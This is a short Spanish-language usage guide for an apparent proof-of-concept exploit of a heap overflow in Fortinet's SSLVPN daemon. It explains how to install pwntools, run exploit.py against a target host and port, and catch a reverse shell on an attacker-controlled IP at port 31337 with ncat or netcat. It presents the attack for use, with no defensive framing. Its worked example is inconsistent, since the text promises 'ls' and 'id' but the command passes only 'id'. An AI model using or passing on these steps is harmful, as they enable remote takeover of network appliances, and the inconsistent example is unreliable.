
Código POC para explotar el desbordamiento de montón en el demonio SSLVPN de Fortinet
pip install pwntools Para usar este código, puedes guardarlo en un archivo, por ejemplo exploit.py, y luego ejecutarlo con Python en la línea de comandos, pasando los argumentos requeridos. Aquí hay un comando de ejemplo para ejecutar el exploit
python exploit.py <target_host> <target_port> <reverse_ip>
Reemplace <target_host> con el nombre de host o la dirección IP del sistema objetivo, <target_port> con el número de puerto del servicio vulnerable, y <reverse_ip> con la dirección IP de la máquina en la que deseas recibir una shell. Los argumentos restantes son los comandos que deseas ejecutar, separados por espacios.
Por ejemplo, si el sistema objetivo tiene la dirección IP 192.168.0.100, el servicio vulnerable se ejecuta en el puerto 8080, y deseas ejecutar los comandos ls e id, ejecutarías el siguiente comando:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
Esto creará una conexión de shell inversa a 192.168.0.101:31337 y ejecutará los comandos ls e id en el sistema objetivo. Ten en cuenta que necesitarás tener un listener ejecutándose en la dirección IP y puerto especificados para recibir la shell inversa. Puedes usar herramientas como ncat o netcat para crear un listener.